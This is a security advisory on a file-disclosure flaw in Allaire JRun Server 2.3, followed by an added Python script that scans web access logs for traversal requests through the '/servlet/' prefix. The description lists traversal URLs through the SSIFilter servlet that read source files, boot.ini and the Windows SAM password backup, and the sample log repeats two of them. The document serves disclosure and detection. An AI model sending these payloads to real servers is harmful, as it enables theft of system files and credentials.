Vulnerability

JRUN

Affected

Allaire JRUN Server 2.3

Description

The following is based on a Foundstone Security Advisory by Shreeraj Shah, Saumil Shah and Stuart McClure.

Multiple show code vulnerabilities exist in Allaire's JRUN Server 2.3, allowing an attacker to view the source code of any file within the web document root of the web server. Using the same vulnerability, it is also possible to retrieve arbitrary files that lie outside the web document root on the host operating system's file system.

JRun 2.3 uses Java Servlets to handle parsing of various types of pages (for example, HTML, JSP, etc). Based on the settings in the rules.properties and servlets.properties files, it is possible to invoke any servlet using the URL prefix "/servlet/".

It is possible to use JRun's SSIFilter servlet to retrieve arbitrary files on the target system. The following two examples show the URLs that can be used to retrieve any arbitrary files:

http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../test.jsp
http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../../../../../../boot.ini
http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../../../../../../winnt/repair/sam._

http://jrun:8000/servlet/ssifilter/../../test.jsp
http://jrun:8000/servlet/ssifilter/../../../../../../../boot.ini
http://jrun:8000/servlet/ssifilter/../../../../../../../winnt/repair/sam._

Note: It is assumed that JRun runs on host "jrun", port 8000.

Solution

Follow the recommendations given in Allaire Security Bulletin ASB00-28.
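To check existing access logs for the request pattern shown in the Description, the following added example (not part of the Foundstone advisory or Allaire's bulletin) flags any "/servlet/" request whose path after the servlet name contains a ".." segment. It assumes Common Log Format lines; the sample log is constructed and ExampleServlet is a hypothetical name.

```python
import re
from urllib.parse import unquote, urlsplit

# Request field of a Common Log Format line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
SERVLET_PREFIX = "/servlet/"

def servlet_traversal(target):
    """Return the servlet name when a /servlet/ request carries a '..'
    segment in the path that follows the servlet name, else None."""
    path = urlsplit(target).path
    for _ in range(3):  # undo nested percent-encoding before inspecting
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    path = path.replace("\\", "/")  # Windows hosts accept either separator
    if not path.lower().startswith(SERVLET_PREFIX):
        return None
    servlet, _, path_info = path[len(SERVLET_PREFIX):].partition("/")
    if servlet and ".." in path_info.split("/"):
        return servlet
    return None

def scan(lines):
    """Return (line number, servlet, raw target) for each flagged request."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        servlet = servlet_traversal(match.group("target"))
        if servlet:
            hits.append((lineno, servlet, match.group("target")))
    return hits

# Constructed sample log; addresses, timestamps, status codes and sizes are
# made up, and ExampleServlet is a hypothetical servlet name.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2001:10:00:00 +0000] "GET /index.jsp HTTP/1.0" 200 512',
    '192.0.2.10 - - [01/Jan/2001:10:00:05 +0000] "GET /servlet/ssifilter/../../test.jsp HTTP/1.0" 200 2048',
    '192.0.2.11 - - [01/Jan/2001:10:01:00 +0000] "GET /servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../../../../../../boot.ini HTTP/1.0" 200 289',
    '192.0.2.12 - - [01/Jan/2001:10:02:00 +0000] "GET /servlet/ExampleServlet/report HTTP/1.0" 200 900',
]

if __name__ == "__main__":
    for lineno, servlet, target in scan(SAMPLE_LOG):
        print(f"line {lineno}: servlet={servlet} target={target}")
```

The check is keyed on the "/servlet/" prefix rather than on the SSIFilter name, since the advisory notes that any servlet can be invoked through that prefix.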